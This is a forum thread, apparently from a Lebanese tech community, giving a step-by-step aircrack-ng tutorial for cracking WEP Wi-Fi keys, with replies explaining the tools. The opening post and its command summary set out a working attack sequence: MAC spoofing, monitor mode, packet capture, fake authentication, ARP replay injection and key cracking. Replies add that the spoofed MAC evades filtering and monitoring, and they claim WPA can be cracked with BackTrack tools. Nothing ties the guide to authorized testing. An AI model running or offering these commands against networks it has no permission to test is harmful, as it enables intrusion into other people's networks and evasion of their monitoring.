Hey Geeks !

Now After ive explained How To install aircrack-ng in this thread : http://www.lebgeeks.com/forums/viewtopic.php?id=7542

so everyone Asks How to use it !?

1- first of all disconnect your connection

2-then open a terminal [ Applications > Accessories > Terminal ]

and write 
sudo airmon-ng stop wlan0
then write 
sudo ifconfig wlan0 down
then 
sudo macchanger --mac 00:11:22:33:44:55 wlan0
This Command above is to make a fake mac

then 
sudo airmon-ng start wlan0
then 
sudo airodump-ng wlan0
the command above is to search for wirless networks

the most important things are the BSSID and the CH "channel"

then write this command
airodump-ng -c "ch" -w "filename" --bssid "bssid" wlan0
By Changing "ch" by the wirless network channel , and the filename we change it to anything we want , ill change it to lebgeeks so if you put another name u need to change it in the next commands


example of editing the command :
airodump-ng -c 8 -w lebgeeks --bssid 1C:AF:F7:84:CB:24 wlan0
then write this command by changing (bssid) by the network bssid
sudo aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
and we wait until the number of packets reaches like 30000

and then write this command
by changing (bssid) by the network bssid 
aircrack-ng -b (bssid) lebgeeks-01.cap
and the key will be cracked :)

For more informations :

see this video : http://www.youtube.com/watch?v=6RIUOoMdkv8&feature=related

This only works on WEP networks.

Download Ubuntu: http://www.ubuntu.com/getubuntu/download

the aircrack forums here: http://forum.aircrack-ng.org

Is your card compatible? see this : http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=2f6f91d3d0e22db32ac23321be8cd875

and you should not use Ctrl + C in copying codes because that may affect on the program

and when there is a command and u cant write it just open a new terminal and write it :)

Sorry for my bad english :)

Best Regards / ShekvaL
Command Explinations :
sudo apt-get install macchanger
sudo apt-get install aircrack-ng

sudo airmon-ng stop wlan0
sudo ifconfig wlan0 down
sudo macchanger --mac 00:11:22:33:44:55 wlan0
sudo airmon-ng start wlan0
sudo airodump-ng wlan0
sudo airodump-ng -c [channel] -w [filename] --bssid [bssid] wlan0
sudo aireplay-ng -1 0 -a [bssid] -h [fake mac] mon0
sudo aireplay-ng -3 -b [bssid] -h [fake mac] wlan0
aircrack-ng -b [bssid] [filename]-01.cap
Thanks for posting. However your tutorial still lacks a lot of information.

It would be nice if you could explain what each of these commands do. Without necessarily going into the basics of computer networking, you should still explain more.

Like for example:

1- Why do you need a fake mac?
2- Why do you wait for 30 000 packets?
3- What is the role of each of the tools you're using (airodump, aireplay-ng, airmon)?

It'd be nice if you have the time to complete your tutorial so we could have something finished to use as a reference.
I am not surprised that WEP is hackable. The WEP algorithm itself has a bug and is not secure. Use WPA or WPA2 people!
rahmu wroteThanks for posting. However your tutorial still lacks a lot of information.

It would be nice if you could explain what each of these commands do. Without necessarily going into the basics of computer networking, you should still explain more.

Like for example:

1- Why do you need a fake mac?
2- Why do you wait for 30 000 packets?
3- What is the role of each of the tools you're using (airodump, aireplay-ng, airmon)?

It'd be nice if you have the time to complete your tutorial so we could have something finished to use as a reference.
1-sometime u fail to associate the AP due to MAC filtering enabled, then you should try to use a fake MAC address.

2- cracking the key it depends on receiving the biggest number of packets , and it depends on the access point itself some 3000 packets is enough , some needs more , but 30000 is only to make sure that we have the right number

3-airodump : Grabbing IVs
- airplay : Packet injector to attack APs.

Thanks to Google :P :

- airodump : is a packet capture tool for aircrack-ng. It allows dumping packets directly from WLAN interface and saving them to a pcap or IVs file.

aireplay : is used for re-injecting wireless 802.11 frames on to the specified channel. The main aim of aireplay-NG is to generate large amount of traffic so that it can be used later for cracking the WEP or WPA-PSK keys with the help of aircrack-NG. The input to Aireplay-NG will be either the pcap file which needs to be injected or the interface name, as aireplay-NG is even capable of capturing packets on the wireless interface.

airmon : is simple and easy to use tool and is a part of Aircrack-NG suite of products. Aircrack-NG is a set of tools for auditing wireless networks. These tools automate in between steps involved in WEP cracking, from setting the interface in monitor mode to sniffing packets, re-injecting packets, examining these packets against different attack vectors, cracking the WEP key and finally decrypting the WEP-encrypted packets. Airmon-NG automates the first stop i.e. setting the interface into monitor mode.

The enabling step for WEP cracking is the ability to sniff wireless packets and to inject wireless packets. By sniffing wireless packets one can discovery wireless devices like APs, Clients and their associations and by injecting wireless packets the whole WEP cracking process can be accelerated by orders of magnitude. For both of these operations, you need to put your interface in monitor mode. There are elaborate commands provided by every driver for setting the interface in monitor mode. Airmon NG automates the process of putting interface into monitor mode.
Note that some wireless cards do not support packet injection...
rahmu wroteThanks for posting. However your tutorial still lacks a lot of information.

It would be nice if you could explain what each of these commands do. Without necessarily going into the basics of computer networking, you should still explain more.

Like for example:

1- Why do you need a fake mac?
2- Why do you wait for 30 000 packets?
3- What is the role of each of the tools you're using (airodump, aireplay-ng, airmon)?

It'd be nice if you have the time to complete your tutorial so we could have something finished to use as a reference.
1- You will bypass restriction if macfiltering is there, you will hide yourself in case the network is monitored.

2- 30 000 packets is only enough if you are using the aircrack -z mode ( PTW attack ) else you need at least 500,000 vector ( IVs ) , that is for a 104-bit key.

3- explained
10 months later
I recently installed aircrack-ng on Mint, but I'm having a fixed channel problem whenever I use aireplay-ng to do a fake authentication with the AP. Any idea how to solve this problem? I'm using RTL8187 chipset.
Thanks in advance :)
WPA is hack able with backtrack :)
lorcan32 wroteWPA is hack able with backtrack :)
I use Gerix. It has a lovely user interface too :)